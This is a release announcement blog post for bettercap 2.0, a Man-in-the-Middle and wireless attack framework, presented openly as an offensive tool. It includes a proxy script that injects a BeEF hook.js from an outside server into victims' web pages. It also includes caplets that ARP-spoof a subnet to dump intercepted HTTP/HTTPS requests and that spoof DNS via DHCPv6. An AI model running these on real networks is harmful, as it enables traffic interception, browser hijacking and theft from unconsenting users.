All Hail Bettercap 2.0, One Tool to Rule Them All.


It’s with immense pleasure that I announce the release of the second generation of bettercap, a complete reimplementation of the most complete and advanced Man-in-the-Middle attack framework. This release not only brings MITM attacks to the next level, but it aims to be the reference framework for network monitoring (we <3 blueteams too), 802.11, BLE attacks and more! :D

ベッターキャップ!

The first thing I want to mention is the amazing team that helped me debugging during endless sessions on Windows, or implemented new features that changed the tool radically, or tested, or gave ideas, or reported bugs (on GitHub, not on Twitter -.-) … you guys rock and I am so lucky, thank you.

Let’s get started :D

Performances

As who’s following either me or bettercap itself on Twitter probably knows, the biggest change has been in the underlying technology and framework that bettercap relies upon, we switched from a Ruby application, to a compiled Go application and this increased performances tremendously for several reasons.

First, we’re not victims of a GIL anymore, this plus Go’s amazing concurrency mechanisms allowes bettercap 2.0 to run on low end hardware and still keep proxying hundreds of connections per second and forwarding tens of hundres of packets, while the previous version had an average of 5-6 connections/s due to how I/O requests were pooled by the interpreter while locking (aka the GIL sucks, a lot). Long story short, no more unwanted network DoS when performing a MITM attack!! F YEAH! - put cool ninja move here -

Also memory and CPU usage now are extremely optimized, you can run several instances of bettercap on your Raspberry Pi (or laptop, or router, or whatever … quite literally) and your CPU cores won’t even get to 20% unless you’re attacking a huge subnet … you can monitor LAN events in real time, while scanning for WiFi access points, while attacking BLE devices nearby and all at the same time, super fast, on low end hardware … but more on this later.

TL;DR: FU Ruby, Go is amazing, fast and scales exceptionally well.

Ease of installation and Portability

Needless to say, having a single binary with zero dependencies (or just libpcap.so on some platforms, thing that will be solved with a full static build soon) that you can just drop on a router/server/whatever and run is way better than the whole rubygems/rvm/rubyenv/whateverbs mess, while if you want to update to bleeding edge, all you have to do is install Go and then go get -u github.com/bettercap/bettercap … how freaking cool is that? :D

Oh … and this new version supports Windows, macOS, Android, Linux (arm, mips, mips64, etc) and soon iOS ^_^

Old but brand new.

The useful features of the old version have been ported to this new one and you will find them as session modules (really, RTFM, I spent hours writing that shit), so you’ll have net.recon searching for new hosts on your network while net.probe will keep probing for new ones, there’s our old friend arp.spoof with his buddies tcp.proxy, http.proxy and https.proxy (now all proxies are scriptable in Javascript) with some new dhcp6.spoof friend. You have the net.sniffer of course, a syn.scanner if you need and several other core modules you can use to script your interactive session while the events.stream will flow in front of you :D

Talking about scripting, as I said proxy modules are easily scriptable in JS:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
function onLoad() {
log( "BeefInject loaded." );
log("targets: " + env['arp.spoof.targets']);
}

function onResponse(req, res) {
if( res.ContentType.indexOf('text/html') == 0 ){
var body = res.ReadBody();
if( body.indexOf('</head>') != -1 ) {
res.Body = body.replace(
'</head>',
'<script type="text/javascript" src="http://beef-server:3000/hook.js"></script></head>'
);
}
}
}

Also, now we have “caplets”, which are basically like metasploit .rc files … enough ugly shell scripts because we don’t remember the command line for every attack scenario, now you can save your commands as .cap files and load them from your interactive session, let’s see a couple of interesting examples :D

http-req-dump.cap

Execute an ARP spoofing attack on the whole network (by default) or on a host (using -eval as described), intercept HTTP and HTTPS requests with the http.proxy and https.proxy modules and dump them using the http-req-dumsp.js proxy script.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# targeting the whole subnet by default, to make it selective:
#
# sudo ./bettercap -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"

# to make it less verbose
# events.stream off

# discover a few hosts
net.probe on
sleep 1
net.probe off

# uncomment to enable sniffing too
# set net.sniff.verbose false
# set net.sniff.local true
# set net.sniff.filter tcp port 443
# net.sniff on

# we'll use this proxy script to dump requests
set https.proxy.script caplets/http-req-dump.js
set http.proxy.script caplets/http-req-dump.js
clear

# go ^_^
http.proxy on
https.proxy on
arp.spoof on

netmon.cap

An example of how to use the ticker module, use this caplet to monitor activities on your network.

1
2
3
4
5
6
7
# clear the screen and show data every second
# this will create a nice animation of your
# network activity
set ticker.commands "clear; net.show; events.show 20"
ticker on

net.probe on

airodump.cap

Same as netmon.cap but will monitor for WiFi access points and clients instead of network hosts.

1
2
3
4
5
6
7
8
9
10
11
12
13
# let's add some api :D
include caplets/rest-api.cap

set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset}
set ticker.commands clear; wifi.show; net.show; events.show 20

# uncomment to disable channel hopping
# set wifi.recon.channel 1

wifi.recon on
ticker on
events.clear
clear

mitm6.cap

Reroute IPv4 DNS requests by using DHCPv6 replies, start a HTTP server and DNS spoofer for microsoft.com and google.com (works against Windows 10 ^_^):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com, google.com
set dhcp6.spoof.domains microsoft.com, google.com

# every request http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www

# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on

# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
# clear the events buffer and the screen
events.clear
clear

These are just a few basic examples, I strongly encourage you to check the caplets repository.

WiFi, BLE and more to come!

There’s a brand new wifi.recon module that will either stick to a channel or perform channel hopping, both for 2.4Ghz and 5.0Ghz frequencies, reporting useful information on what’s going on at the 802.11 layer, the wifi.deauth module will deauth clients (doh!) while the net.sniffer will capture WPA2 handshakes (bye bye kismet, airodump, airmon, wifite, etc!). Meanwhile, the ble.recon will discover every Bluetooth Low Energy device you might want to inspect with ble.enum or fuzz with ble.write. Also wifi.fuzz and ble.fuzz modules are work in progress, as well as sdr.* modules and others.

Did I mention that this works on macOS and Windows too? :D Oh, and probably your macOS has a WiFi card capable of monitor mode and frames injection already :D This release is taking everything to the next level, we’re not just in the ethernet, we are everywhere.

Habemus API

I believe this is functionally the biggest change, or at least the one with the biggest potential: we finally have a REST API! Imagine having a mobile client for your bettercap instance running in your dropbox, or simply imagine to develop a mobile application just by launching the Android executable, using the http.server module itself to serve a web UI and just create a WebView to render it … boom, easy mobile baby! :D

You can read every single bit of information, you can have per IP realtime network statistics, you can send commands, wait for events … the sky is the limit!!! -put evil laugh here-

I’m so looking forward to see what users will create with this API, no more ugly Python wrappers, no more parsing complicated log files! F YEAH!!!

Well, that’s it … everything < 2.0.0 is deprecated and not supported anymore, developement moved here and there’s a pretty decent documentation that’ll help you getting started … as usual, enjoy :)

Become a Patron!